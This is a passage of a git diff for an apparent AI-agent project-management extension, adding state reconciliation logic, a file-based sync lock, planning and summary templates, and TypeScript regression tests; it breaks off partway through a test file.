+      logWarning("state", `GSD_SLICE_LOCK=${sliceLockLegacy} not found in active slices — worker has no assigned work`);
+      return {
+        activeMilestone,
+        activeSlice: null,
+        activeTask: null,
+        phase: 'blocked',
+        recentDecisions: [],
+        blockers: [`GSD_SLICE_LOCK=${sliceLockLegacy} not found in active milestone slices`],
+        nextAction: 'Slice lock references a non-existent slice — check orchestrator dispatch.',
+        registry,
+        requirements,
+        progress: {
+          milestones: milestoneProgress,
+          slices: sliceProgress,
+        },
+      };
+    }
+  } else {
+    for (const s of activeRoadmap.slices) {
+      if (s.done) continue;
+      if (s.depends.every(dep => doneSliceIds.has(dep))) {
+        activeSlice = { id: s.id, title: s.title };
+        break;
+      }
     }
   }
 
@@ -682,6 +1515,22 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
   }
 
   const slicePlan = parsePlan(slicePlanContent);
+
+  // ── Reconcile stale task status for filesystem-based projects (#2514) ──
+  // Heading-style tasks (### T01:) are always parsed as done=false by
+  // parsePlan because the heading syntax has no checkbox. When the agent
+  // writes a SUMMARY file but the plan's heading isn't converted to a
+  // checkbox, the task appears incomplete forever — causing infinite
+  // re-dispatch. Reconcile by checking SUMMARY files on disk.
+  for (const t of slicePlan.tasks) {
+    if (t.done) continue;
+    const summaryPath = resolveTaskFile(basePath, activeMilestone.id, activeSlice.id, t.id, "SUMMARY");
+    if (summaryPath && existsSync(summaryPath)) {
+      t.done = true;
+      logWarning("reconcile", `task ${activeMilestone.id}/${activeSlice.id}/${t.id} reconciled via SUMMARY on disk (#2514)`, { mid: activeMilestone.id, sid: activeSlice.id, tid: t.id });
+    }
+  }
+
   const taskProgress = {
     done: slicePlan.tasks.filter(t => t.done).length,
     total: slicePlan.tasks.length,
diff --git a/src/resources/extensions/gsd/status-guards.ts b/src/resources/extensions/gsd/status-guards.ts
new file mode 100644
index 000000000..ffd54dfc4
--- /dev/null
+++ b/src/resources/extensions/gsd/status-guards.ts
@@ -0,0 +1,27 @@
+/**
+ * Status predicates for GSD state-machine guards.
+ *
+ * The DB stores status as free-form strings. Three values indicate
+ * "closed": "complete" (canonical), "done" (legacy / alias), and
+ * "skipped" (user-directed skip via rethink or backtrack).
+ * Every inline `status === "complete" || status === "done"` should
+ * use isClosedStatus() instead.
+ */
+
+/** Returns true when a milestone, slice, or task status indicates closure. */
+export function isClosedStatus(status: string): boolean {
+  return status === "complete" || status === "done" || status === "skipped";
+}
+
+/** Returns true when a slice status indicates it was deferred by a decision. */
+export function isDeferredStatus(status: string): boolean {
+  return status === "deferred";
+}
+
+/**
+ * Returns true when a slice should be skipped during active-slice selection.
+ * This includes both closed (complete/done) and deferred slices.
+ */
+export function isInactiveStatus(status: string): boolean {
+  return isClosedStatus(status) || isDeferredStatus(status);
+}
diff --git a/src/resources/extensions/gsd/sync-lock.ts b/src/resources/extensions/gsd/sync-lock.ts
new file mode 100644
index 000000000..168a336a6
--- /dev/null
+++ b/src/resources/extensions/gsd/sync-lock.ts
@@ -0,0 +1,94 @@
+// GSD Extension — Advisory Sync Lock
+// Prevents concurrent worktree syncs from colliding via a simple file lock.
+// Stale locks (mtime > 60s) are auto-overridden. Lock acquisition waits up
+// to 5 seconds then skips non-fatally.
+
+import { existsSync, statSync, unlinkSync } from "node:fs";
+import { join } from "node:path";
+import { atomicWriteSync } from "./atomic-write.js";
+
+const STALE_THRESHOLD_MS = 60_000; // 60 seconds
+const DEFAULT_TIMEOUT_MS = 5_000;  // 5 seconds
+const SPIN_INTERVAL_MS = 100;      // 100ms polling interval
+
+// SharedArrayBuffer for synchronous sleep via Atomics.wait
+const SLEEP_BUFFER = new SharedArrayBuffer(4);
+const SLEEP_VIEW = new Int32Array(SLEEP_BUFFER);
+
+function lockFilePath(basePath: string): string {
+  return join(basePath, ".gsd", "sync.lock");
+}
+
+function sleepSync(ms: number): void {
+  Atomics.wait(SLEEP_VIEW, 0, 0, ms);
+}
+
+/**
+ * Acquire an advisory sync lock for the given basePath.
+ * Returns { acquired: true } on success, { acquired: false } after timeout.
+ *
+ * - Creates lock file at {basePath}/.gsd/sync.lock with JSON { pid, acquired_at }
+ * - If lock exists and mtime > 60s (stale), overrides it
+ * - If lock exists and not stale, spins up to timeoutMs before giving up
+ */
+export function acquireSyncLock(
+  basePath: string,
+  timeoutMs: number = DEFAULT_TIMEOUT_MS,
+): { acquired: boolean } {
+  const lp = lockFilePath(basePath);
+  const deadline = Date.now() + timeoutMs;
+
+  while (true) {
+    // Check if lock file exists
+    if (existsSync(lp)) {
+      // Check staleness
+      try {
+        const stat = statSync(lp);
+        const age = Date.now() - stat.mtimeMs;
+        if (age > STALE_THRESHOLD_MS) {
+          // Stale lock — override it
+          try { unlinkSync(lp); } catch { /* race: already removed */ }
+        } else {
+          // Lock is held and not stale — wait or give up
+          if (Date.now() >= deadline) {
+            return { acquired: false };
+          }
+          sleepSync(SPIN_INTERVAL_MS);
+          continue;
+        }
+      } catch {
+        // stat failed (file removed between exists check and stat) — try to acquire
+      }
+    }
+
+    // Lock file does not exist (or was just removed) — try to write it
+    try {
+      const lockData = {
+        pid: process.pid,
+        acquired_at: new Date().toISOString(),
+      };
+      atomicWriteSync(lp, JSON.stringify(lockData, null, 2));
+      return { acquired: true };
+    } catch {
+      // Write failed (race condition with another process) — retry or give up
+      if (Date.now() >= deadline) {
+        return { acquired: false };
+      }
+      sleepSync(SPIN_INTERVAL_MS);
+    }
+  }
+}
+
+/**
+ * Release the advisory sync lock. No-op if lock file does not exist.
+ */
+export function releaseSyncLock(basePath: string): void {
+  const lp = lockFilePath(basePath);
+  try {
+    if (existsSync(lp)) {
+      unlinkSync(lp);
+    }
+  } catch {
+    // Non-fatal — lock may have been released by another process
+  }
+}
diff --git a/src/resources/extensions/gsd/templates/preferences.md b/src/resources/extensions/gsd/templates/PREFERENCES.md
similarity index 97%
rename from src/resources/extensions/gsd/templates/preferences.md
rename to src/resources/extensions/gsd/templates/PREFERENCES.md
index 83fcde1a2..878e2ccdf 100644
--- a/src/resources/extensions/gsd/templates/preferences.md
+++ b/src/resources/extensions/gsd/templates/PREFERENCES.md
@@ -71,6 +71,8 @@ remote_questions:
 uat_dispatch:
 post_unit_hooks: []
 pre_dispatch_hooks: []
+# experimental:
+#   rtk: false
 ---
 
 # GSD Skill Preferences
diff --git a/src/resources/extensions/gsd/templates/context-enhanced.md b/src/resources/extensions/gsd/templates/context-enhanced.md
new file mode 100644
index 000000000..503ffaf17
--- /dev/null
+++ b/src/resources/extensions/gsd/templates/context-enhanced.md
@@ -0,0 +1,138 @@
+# {{milestoneId}}: {{milestoneTitle}}
+
+**Gathered:** {{date}}
+**Status:** Ready for planning
+
+## Project Description
+
+{{description}}
+
+## Why This Milestone
+
+{{whatProblemThisSolves_AND_whyNow}}
+
+## Codebase Brief
+
+### Technology Stack
+
+{{techStack}}
+
+### Key Modules
+
+{{keyModules}}
+
+### Patterns in Use
+
+{{patternsInUse}}
+
+## User-Visible Outcome
+
+### When this milestone is complete, the user can:
+
+- {{literalUserActionInRealEnvironment}}
+- {{literalUserActionInRealEnvironment}}
+
+### Entry point / environment
+
+- Entry point: {{CLI command / URL / bot / extension / service / workflow}}
+- Environment: {{local dev / browser / mobile / launchd / CI / production-like}}
+- Live dependencies involved: {{telegram / database / webhook / rpc subprocess / none}}
+
+## Completion Class
+
+- Contract complete means: {{what can be proven by tests / fixtures / artifacts}}
+- Integration complete means: {{what must work across real subsystems}}
+- Operational complete means: {{what must work under real lifecycle conditions, or none}}
+
+## Architectural Decisions
+
+### {{decisionTitle}}
+
+**Decision:** {{decisionStatement}}
+
+**Rationale:** {{rationale}}
+
+**Evidence:** {{evidence}}
+
+**Alternatives Considered:**
+- {{alternative1}} — {{whyNotChosen1}}
+- {{alternative2}} — {{whyNotChosen2}}
+
+---
+
+> Add additional decisions as separate `### Decision Title` blocks following the same structure above.
+
+## Interface Contracts
+
+{{interfaceContracts}}
+
+> Document API boundaries, function signatures, data shapes, or protocol agreements that must be honored. Leave blank or remove if not applicable to this milestone.
+
+## Error Handling Strategy
+
+{{errorHandlingStrategy}}
+
+> Describe the approach for handling failures, edge cases, and error propagation. Include retry policies, fallback behaviors, and user-facing error messages where relevant.
+
+## Final Integrated Acceptance
+
+To call this milestone complete, we must prove:
+
+- {{one real end-to-end scenario}}
+- {{one real end-to-end scenario}}
+- {{what cannot be simulated if this milestone is to be considered truly done}}
+
+## Testing Requirements
+
+{{testingRequirements}}
+
+> Specify test types (unit, integration, e2e), coverage expectations, and any specific test scenarios that must pass.
+
+## Acceptance Criteria
+
+{{acceptanceCriteria}}
+
+> Per-slice acceptance criteria gathered during discussion. Each slice should have clear, testable criteria.
+
+## Risks and Unknowns
+
+- {{riskOrUnknown}} — {{whyItMatters}}
+
+## Existing Codebase / Prior Art
+
+- `{{fileOrModule}}` — {{howItRelates}}
+- `{{fileOrModule}}` — {{howItRelates}}
+
+> See `.gsd/DECISIONS.md` for all architectural and pattern decisions — it is an append-only register; read it during planning, append to it during execution.
+
+## Relevant Requirements
+
+- {{requirementId}} — {{howThisMilestoneAdvancesIt}}
+
+## Scope
+
+### In Scope
+
+- {{inScopeItem}}
+
+### Out of Scope / Non-Goals
+
+- {{outOfScopeItem}}
+
+## Technical Constraints
+
+- {{constraint}}
+
+## Integration Points
+
+- {{systemOrService}} — {{howThisMilestoneInteractsWithIt}}
+
+## Ecosystem Notes
+
+{{ecosystemNotes}}
+
+> Research findings, best practices, known issues, and relevant external documentation discovered during preparation.
+
+## Open Questions
+
+- {{question}} — {{currentThinking}}
diff --git a/src/resources/extensions/gsd/templates/milestone-summary.md b/src/resources/extensions/gsd/templates/milestone-summary.md
index 254db7d4c..a36108739 100644
--- a/src/resources/extensions/gsd/templates/milestone-summary.md
+++ b/src/resources/extensions/gsd/templates/milestone-summary.md
@@ -49,6 +49,14 @@ completed_at: {{date}}
 
 - {{requirementId}}: {{fromStatus}} → {{toStatus}} — {{evidence}}
 
+## Decision Re-evaluation
+
+<!-- Review decisions from this milestone. OMIT if no decisions need re-evaluation. -->
+
+| Decision | Original Rationale | Still Valid? | Action |
+|----------|-------------------|-------------|--------|
+| {{decisionId}} | {{originalRationale}} | {{yes/no/partially}} | {{keep/revise/supersede}} |
+
 ## Forward Intelligence
 
 <!-- Write what you wish you'd known at the start of this milestone.
diff --git a/src/resources/extensions/gsd/templates/milestone-validation.md b/src/resources/extensions/gsd/templates/milestone-validation.md
index 20cfdc302..8b25d8aec 100644
--- a/src/resources/extensions/gsd/templates/milestone-validation.md
+++ b/src/resources/extensions/gsd/templates/milestone-validation.md
@@ -35,6 +35,18 @@ validated_at: {{date}}
 
 - **{{requirementId}}**: {{status}} — {{disposition: covered by remediation slice / acceptable gap / needs attention}}
 
+## Verification Class Compliance
+
+<!-- If verification classes were defined during planning, document whether each
+     was addressed. Use N/A for classes that were empty or "none" in planning. -->
+
+| Class | Planned | Evidence | Status |
+|-------|---------|----------|--------|
+| Contract | {{planned_or_none}} | {{evidence_or_none}} | {{MET / NOT MET / N/A}} |
+| Integration | {{planned_or_none}} | {{evidence_or_none}} | {{MET / NOT MET / N/A}} |
+| Operational | {{planned_or_none}} | {{evidence_or_none}} | {{MET / NOT MET / N/A}} |
+| UAT | {{planned_or_none}} | {{evidence_or_none}} | {{MET / NOT MET / N/A}} |
+
 ## Remediation Slices
 
 <!-- New slices appended to the roadmap to address auto-remediable gaps.
diff --git a/src/resources/extensions/gsd/templates/plan.md b/src/resources/extensions/gsd/templates/plan.md
index 59922fd2b..3cfc119cd 100644
--- a/src/resources/extensions/gsd/templates/plan.md
+++ b/src/resources/extensions/gsd/templates/plan.md
@@ -8,6 +8,22 @@
 - {{mustHave}}
 - {{mustHave}}
 
+## Threat Surface
+
+<!-- Q3: How can this be exploited? OMIT ENTIRELY for simple slices with no auth, user input, or data exposure. -->
+
+- **Abuse**: {{abuseScenarios — parameter tampering, replay, privilege escalation, or N/A}}
+- **Data exposure**: {{sensitiveDataAccessible — PII, tokens, secrets, or none}}
+- **Input trust**: {{untrustedInput — user input reaching DB/API/filesystem, or none}}
+
+## Requirement Impact
+
+<!-- Q4: What existing promises does this break? OMIT ENTIRELY if no existing requirements are affected. -->
+
+- **Requirements touched**: {{requirementIds — e.g. R001, R003, or none}}
+- **Re-verify**: {{whatMustBeRetested — e.g. login flow, API contract, or N/A}}
+- **Decisions revisited**: {{decisionIds — e.g. D002, or none}}
+
 ## Proof Level
 
 <!-- Omit this section entirely for simple slices where the answer is trivially obvious. -->
diff --git a/src/resources/extensions/gsd/templates/roadmap.md b/src/resources/extensions/gsd/templates/roadmap.md
index 4fbb7d79d..35d2e705f 100644
--- a/src/resources/extensions/gsd/templates/roadmap.md
+++ b/src/resources/extensions/gsd/templates/roadmap.md
@@ -92,6 +92,19 @@ This milestone is complete only when all are true:
   - Each "After this" line must be truthful about proof level: if only fixtures or tests prove it, say so; do not imply the user can already perform the live end-to-end behavior unless that has actually been exercised
 -->
 
+## Horizontal Checklist
+
+<!-- Cross-cutting concerns across all slices. Check each that was considered.
+     OMIT ENTIRELY for trivial milestones. -->
+
+- [ ] Every active R### re-read against new code — still fully satisfied?
+- [ ] Every D### from prior milestones re-evaluated — still valid at new scope?
+- [ ] Graceful shutdown / cleanup on termination verified
+- [ ] Revenue / billing path impact assessed (or N/A)
+- [ ] Auth boundary documented — what's protected vs public
+- [ ] Shared resource budget confirmed — connection pools, caches, rate limits hold under peak
+- [ ] Reconnection / retry strategy verified for every external dependency
+
 ## Boundary Map
 
 <!-- Be specific. Name concrete outputs: API endpoints, event payloads, shared types/interfaces,
diff --git a/src/resources/extensions/gsd/templates/slice-summary.md b/src/resources/extensions/gsd/templates/slice-summary.md
index 3b7851eb5..308980825 100644
--- a/src/resources/extensions/gsd/templates/slice-summary.md
+++ b/src/resources/extensions/gsd/templates/slice-summary.md
@@ -57,6 +57,15 @@ completed_at: {{date}}
 
 - {{requirementIdOr_none}} — {{what changed}}
 
+## Operational Readiness
+
+<!-- Q8: How will ops know it's healthy/broken? OMIT ENTIRELY for simple slices with no runtime concerns. -->
+
+- **Health signal**: {{howToConfirmHealthy — health endpoint, heartbeat log, metric, or N/A}}
+- **Failure signal**: {{howToDetectBroken — error rate spike, alert, log pattern, or N/A}}
+- **Recovery**: {{selfRecoverOrRestart — auto-reconnect, circuit breaker, manual restart, or N/A}}
+- **Monitoring gaps**: {{silentFailureModes — background jobs, cache eviction, memory pressure, or none}}
+
 ## Deviations
 
 <!-- Deviations are unplanned changes to the written plan, not ordinary debugging inside the plan's intended scope. -->
diff --git a/src/resources/extensions/gsd/templates/task-plan.md b/src/resources/extensions/gsd/templates/task-plan.md
index 87d8ebd20..645c93be4 100644
--- a/src/resources/extensions/gsd/templates/task-plan.md
+++ b/src/resources/extensions/gsd/templates/task-plan.md
@@ -17,6 +17,30 @@ skills_used:
 
 {{description}}
 
+## Failure Modes
+
+<!-- Q5: What breaks when dependencies fail? OMIT ENTIRELY for tasks with no external dependencies. -->
+
+| Dependency | On error | On timeout | On malformed response |
+|------------|----------|-----------|----------------------|
+| {{dependency}} | {{errorStrategy}} | {{timeoutStrategy}} | {{malformedStrategy}} |
+
+## Load Profile
+
+<!-- Q6: What breaks at 10x load? OMIT ENTIRELY for tasks with no shared resources or scaling concerns. -->
+
+- **Shared resources**: {{sharedResources — DB connections, caches, rate limiters, or none}}
+- **Per-operation cost**: {{perOpCost — N API calls, M DB queries, K bytes, or trivial}}
+- **10x breakpoint**: {{whatBreaksFirst — pool exhaustion, rate limit, memory, or N/A}}
+
+## Negative Tests
+
+<!-- Q7: What negative tests prove robustness? OMIT ENTIRELY for trivial tasks. -->
+
+- **Malformed inputs**: {{malformedInputTests — empty string, null, oversized, wrong type}}
+- **Error paths**: {{errorPathTests — network timeout, auth failure, 5xx, invalid JSON}}
+- **Boundary conditions**: {{boundaryTests — empty list, max length, zero, off-by-one}}
+
 ## Steps
 
 1. {{step}}
diff --git a/src/resources/extensions/gsd/tests/active-milestone-id-guard.test.ts b/src/resources/extensions/gsd/tests/active-milestone-id-guard.test.ts
new file mode 100644
index 000000000..10bf649d5
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/active-milestone-id-guard.test.ts
@@ -0,0 +1,91 @@
+/**
+ * Regression test for #2773 — activeMilestone.id guard
+ *
+ * When activeMilestone is a non-null object with `id: undefined` (corrupted
+ * state), the old `!state.activeMilestone` truthiness check passed through,
+ * causing a downstream crash when code assumed `.id` was a valid string.
+ *
+ * The fix uses optional chaining (`!state.activeMilestone?.id`) so all three
+ * "no usable milestone" shapes are caught:
+ *   1. activeMilestone === null
+ *   2. activeMilestone === undefined
+ *   3. activeMilestone === { id: undefined, title: "..." }
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+
+import type { GSDState, ActiveRef } from '../types.ts'
+
+// ─── Guard Under Test ────────────────────────────────────────────────────────
+// Extracted guard logic identical to headless-query.ts (line 74) and
+// guided-flow.ts (lines 522, 1047).
+
+function activeMilestoneIsUsable(activeMilestone: ActiveRef | null | undefined): boolean {
+  return !!activeMilestone?.id
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe('activeMilestone?.id guard (#2773)', () => {
+  it('rejects null activeMilestone', () => {
+    assert.equal(activeMilestoneIsUsable(null), false)
+  })
+
+  it('rejects undefined activeMilestone', () => {
+    assert.equal(activeMilestoneIsUsable(undefined), false)
+  })
+
+  it('rejects malformed activeMilestone with id: undefined', () => {
+    // This is the crash case from #2773 — object exists but id is undefined
+    const malformed = { id: undefined, title: 'Ghost Milestone' } as unknown as ActiveRef
+    assert.equal(activeMilestoneIsUsable(malformed), false)
+  })
+
+  it('rejects malformed activeMilestone with id: empty string', () => {
+    const malformed = { id: '', title: 'Empty ID Milestone' } as unknown as ActiveRef
+    assert.equal(activeMilestoneIsUsable(malformed), false)
+  })
+
+  it('accepts valid activeMilestone with a real id', () => {
+    const valid: ActiveRef = { id: 'M001', title: 'Real Milestone' }
+    assert.equal(activeMilestoneIsUsable(valid), true)
+  })
+})
+
+describe('headless-query stop behavior with corrupted milestone', () => {
+  // Simulates the decision logic from handleQuery (headless-query.ts:74-78)
+  function deriveNextAction(activeMilestone: ActiveRef | null | undefined, phase: string) {
+    if (!activeMilestone?.id) {
+      return {
+        action: 'stop' as const,
+        reason: phase === 'complete' ? 'All milestones complete.' : 'No active milestone.',
+      }
+    }
+    return { action: 'dispatch' as const, unitId: activeMilestone.id }
+  }
+
+  it('returns stop when activeMilestone is null', () => {
+    const result = deriveNextAction(null, 'pre-planning')
+    assert.equal(result.action, 'stop')
+  })
+
+  it('returns stop when activeMilestone has undefined id', () => {
+    const corrupted = { id: undefined, title: 'Corrupted' } as unknown as ActiveRef
+    const result = deriveNextAction(corrupted, 'executing')
+    assert.equal(result.action, 'stop')
+    assert.equal(result.reason, 'No active milestone.')
+  })
+
+  it('returns dispatch with valid milestone id', () => {
+    const valid: ActiveRef = { id: 'M001', title: 'Valid' }
+    const result = deriveNextAction(valid, 'executing')
+    assert.equal(result.action, 'dispatch')
+  })
+
+  it('returns correct stop reason when phase is complete', () => {
+    const result = deriveNextAction(null, 'complete')
+    assert.equal(result.action, 'stop')
+    assert.equal(result.reason, 'All milestones complete.')
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/activity-log.test.ts b/src/resources/extensions/gsd/tests/activity-log.test.ts
index 423701723..8ae1bba4b 100644
--- a/src/resources/extensions/gsd/tests/activity-log.test.ts
+++ b/src/resources/extensions/gsd/tests/activity-log.test.ts
@@ -4,7 +4,7 @@
  *   - activity-log-save.test.ts (caching, dedup, collision recovery)
  */
 
-import test from "node:test";
+import { describe, test, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
 import { existsSync, mkdtempSync, mkdirSync, readdirSync, realpathSync, rmSync, utimesSync, writeFileSync, readFileSync } from "node:fs";
 import { join, dirname } from "node:path";
@@ -48,9 +48,12 @@ function createCtx(entries: unknown[]) {
 
 // ── Pruning ──────────────────────────────────────────────────────────────────
 
-test("pruneActivityLogs deletes old files, keeps recent and highest-seq", () => {
-  const dir = createTmpDir();
-  try {
+describe("pruneActivityLogs", () => {
+  let dir: string;
+  beforeEach(() => { dir = createTmpDir(); });
+  afterEach(() => { rmSync(dir, { recursive: true, force: true }); });
+
+  test("deletes old files, keeps recent and highest-seq", () => {
     const f001 = writeActivityFile(dir, "001", "execute-task-M001-S01-T01");
     writeActivityFile(dir, "002", "execute-task-M001-S01-T02");
     writeActivityFile(dir, "003", "execute-task-M001-S01-T03");
@@ -61,14 +64,9 @@ test("pruneActivityLogs deletes old files, keeps recent and highest-seq", () =>
     assert.ok(!remaining.includes("001-execute-task-M001-S01-T01.jsonl"));
     assert.ok(remaining.includes("002-execute-task-M001-S01-T02.jsonl"));
     assert.ok(remaining.includes("003-execute-task-M001-S01-T03.jsonl"));
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs preserves highest-seq even when all files are old", () => {
-  const dir = createTmpDir();
-  try {
+  test("preserves highest-seq even when all files are old", () => {
     const f001 = writeActivityFile(dir, "001", "t1");
     const f002 = writeActivityFile(dir, "002", "t2");
     const f003 = writeActivityFile(dir, "003", "t3");
@@ -78,14 +76,9 @@ test("pruneActivityLogs preserves highest-seq even when all files are old", () =
     const remaining = listFiles(dir);
     assert.equal(remaining.length, 1);
     assert.ok(remaining[0].startsWith("003-"));
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs with retentionDays=0 keeps only highest-seq", () => {
-  const dir = createTmpDir();
-  try {
+  test("with retentionDays=0 keeps only highest-seq", () => {
     writeActivityFile(dir, "001", "t1");
     writeActivityFile(dir, "002", "t2");
     writeActivityFile(dir, "003", "t3");
@@ -94,51 +87,31 @@ test("pruneActivityLogs with retentionDays=0 keeps only highest-seq", () => {
     const remaining = listFiles(dir);
     assert.equal(remaining.length, 1);
     assert.ok(remaining[0].startsWith("003-"));
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs no-op when all files are recent", () => {
-  const dir = createTmpDir();
-  try {
+  test("no-op when all files are recent", () => {
     writeActivityFile(dir, "001", "t1");
     writeActivityFile(dir, "002", "t2");
     writeActivityFile(dir, "003", "t3");
 
     pruneActivityLogs(dir, 30);
     assert.equal(listFiles(dir).length, 3);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs handles empty directory", () => {
-  const dir = createTmpDir();
-  try {
+  test("handles empty directory", () => {
     assert.doesNotThrow(() => pruneActivityLogs(dir, 30));
     assert.equal(readdirSync(dir).length, 0);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs preserves single old file (it is highest-seq)", () => {
-  const dir = createTmpDir();
-  try {
+  test("preserves single old file (it is highest-seq)", () => {
     const f = writeActivityFile(dir, "001", "t1");
     backdateFile(f, 100);
 
     pruneActivityLogs(dir, 30);
     assert.equal(listFiles(dir).length, 1);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("pruneActivityLogs ignores non-matching filenames", () => {
-  const dir = createTmpDir();
-  try {
+  test("ignores non-matching filenames", () => {
     const f001 = writeActivityFile(dir, "001", "t1");
     writeFileSync(join(dir, "notes.txt"), "some notes\n", "utf-8");
     backdateFile(f001, 40);
@@ -148,16 +121,17 @@ test("pruneActivityLogs ignores non-matching filenames", () => {
     assert.ok(remaining.includes("notes.txt"));
     // 001 is the only seq file, so it's highest-seq and survives
     assert.ok(remaining.includes("001-t1.jsonl"));
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+  });
 });
 
 // ── Save: caching, dedup, collision recovery ─────────────────────────────────
 
-test("saveActivityLog caches sequence instead of rescanning", () => {
-  const baseDir = createTmpDir();
-  try {
+describe("saveActivityLog", () => {
+  let baseDir: string;
+  beforeEach(() => { baseDir = createTmpDir(); });
+  afterEach(() => { rmSync(baseDir, { recursive: true, force: true }); });
+
+  test("caches sequence instead of rescanning", () => {
     saveActivityLog(createCtx([{ kind: "first", n: 1 }]) as any, baseDir, "execute-task", "M001/S01/T01");
     writeFileSync(join(activityDir(baseDir), "999-external.jsonl"), '{"x":1}\n', "utf-8");
     saveActivityLog(createCtx([{ kind: "second", n: 2 }]) as any, baseDir, "execute-task", "M001/S01/T02");
@@ -166,14 +140,9 @@ test("saveActivityLog caches sequence instead of rescanning", () => {
     assert.ok(files.includes("001-execute-task-M001-S01-T01.jsonl"));
     assert.ok(files.includes("002-execute-task-M001-S01-T02.jsonl"));
     assert.ok(!files.some(f => f.startsWith("1000-")));
-  } finally {
-    rmSync(baseDir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("saveActivityLog deduplicates identical snapshots for same unit", () => {
-  const baseDir = createTmpDir();
-  try {
+  test("deduplicates identical snapshots for same unit", () => {
     const ctx = createCtx([{ role: "assistant", content: "same" }]);
     saveActivityLog(ctx as any, baseDir, "plan-slice", "M002/S01");
     saveActivityLog(ctx as any, baseDir, "plan-slice", "M002/S01");
@@ -184,14 +153,9 @@ test("saveActivityLog deduplicates identical snapshots for same unit", () => {
     saveActivityLog(createCtx([{ role: "assistant", content: "changed" }]) as any, baseDir, "plan-slice", "M002/S01");
     files = listFiles(activityDir(baseDir));
     assert.equal(files.length, 2);
-  } finally {
-    rmSync(baseDir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("saveActivityLog recovers on sequence collision", () => {
-  const baseDir = createTmpDir();
-  try {
+  test("recovers on sequence collision", () => {
     saveActivityLog(createCtx([{ turn: 1 }]) as any, baseDir, "execute-task", "M003/S02/T01");
     writeFileSync(join(activityDir(baseDir), "002-execute-task-M003-S02-T02.jsonl"), '{"collision":true}\n', "utf-8");
     saveActivityLog(createCtx([{ turn: 2 }]) as any, baseDir, "execute-task", "M003/S02/T02");
@@ -199,9 +163,7 @@ test("saveActivityLog recovers on sequence collision", () => {
     const files = listFiles(activityDir(baseDir));
     assert.ok(files.includes("002-execute-task-M003-S02-T02.jsonl"));
     assert.ok(files.includes("003-execute-task-M003-S02-T02.jsonl"));
-  } finally {
-    rmSync(baseDir, { recursive: true, force: true });
-  }
+  });
 });
 
 // ── Prompt text assertion ────────────────────────────────────────────────────
diff --git a/src/resources/extensions/gsd/tests/adversarial-review-fixes.test.ts b/src/resources/extensions/gsd/tests/adversarial-review-fixes.test.ts
new file mode 100644
index 000000000..66c24a082
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/adversarial-review-fixes.test.ts
@@ -0,0 +1,223 @@
+/**
+ * Tests for adversarial review fixes from PR #3602.
+ *
+ * These tests verify the fixes for:
+ * 1. Cross-session state leak in lastPreparationResult (HIGH)
+ * 2. Invalid regex anchor \z in prompt-validation.ts (HIGH)
+ * 3. Consecutive error counter in agent-loop.ts (MEDIUM) — UPSTREAM CODE, NOT MODIFIED
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { getLastPreparationResult, clearPreparationResult } from "../guided-flow.ts";
+import { validateEnhancedContext } from "../prompt-validation.ts";
+
+// ─── Test Helpers ───────────────────────────────────────────────────────────────
+
+function makeTempDir(prefix: string): string {
+  const dir = join(
+    tmpdir(),
+    `gsd-adversarial-test-${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+  );
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function cleanup(dir: string): void {
+  try {
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // best-effort
+  }
+}
+
+// ─── Fix 1: Cross-session state leak in lastPreparationResult ────────────────────
+
+describe("Fix #1 — Cross-session state leak (lastPreparationResult)", () => {
+  beforeEach(() => {
+    clearPreparationResult();
+  });
+
+  afterEach(() => {
+    clearPreparationResult();
+  });
+
+  test("clearPreparationResult sets lastPreparationResult to null", () => {
+    // First, verify the getter returns null after clear
+    clearPreparationResult();
+    const result = getLastPreparationResult();
+    assert.equal(result, null, "lastPreparationResult should be null after clear");
+  });
+
+  test("getLastPreparationResult returns null initially", () => {
+    clearPreparationResult();
+    const result = getLastPreparationResult();
+    assert.equal(result, null, "should return null when no preparation has run");
+  });
+
+  // Note: The actual test that prepareAndBuildDiscussPrompt clears the result
+  // on entry requires mocking ExtensionCommandContext which is complex.
+  // The fix is verified by code inspection and integration tests.
+  // The key behavior is:
+  // 1. lastPreparationResult = null at the start of prepareAndBuildDiscussPrompt
+  // 2. If preparation throws, lastPreparationResult stays null
+  // 3. If discuss_preparation is false, lastPreparationResult stays null
+});
+
+// ─── Fix 2: Invalid regex anchor \z in prompt-validation.ts ──────────────────────
+
+describe("Fix #2 — Invalid regex anchor (prompt-validation.ts)", () => {
+  test("validates content with Architectural Decisions at end of file", () => {
+    // This was the bug: \z is PCRE/Ruby, not JS. JS treated it as literal 'z'.
+    // The section extraction would fail when Architectural Decisions was the
+    // last section (no subsequent ## heading).
+    const contentWithDecisionsAtEnd = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why.
+
+## Acceptance Criteria
+
+- Criterion 1
+
+## Architectural Decisions
+
+### Decision 1
+
+**Decision:** Use TypeScript
+**Rationale:** Type safety
+`;
+
+    const result = validateEnhancedContext(contentWithDecisionsAtEnd);
+    assert.equal(result.valid, true, "should validate content with decisions at end");
+    assert.equal(result.missing.length, 0, "should have no missing sections");
+  });
+
+  test("validates content with Architectural Decisions followed by another section", () => {
+    const contentWithDecisionsInMiddle = `
+# M001: Test Milestone
+
+## Why This Milestone
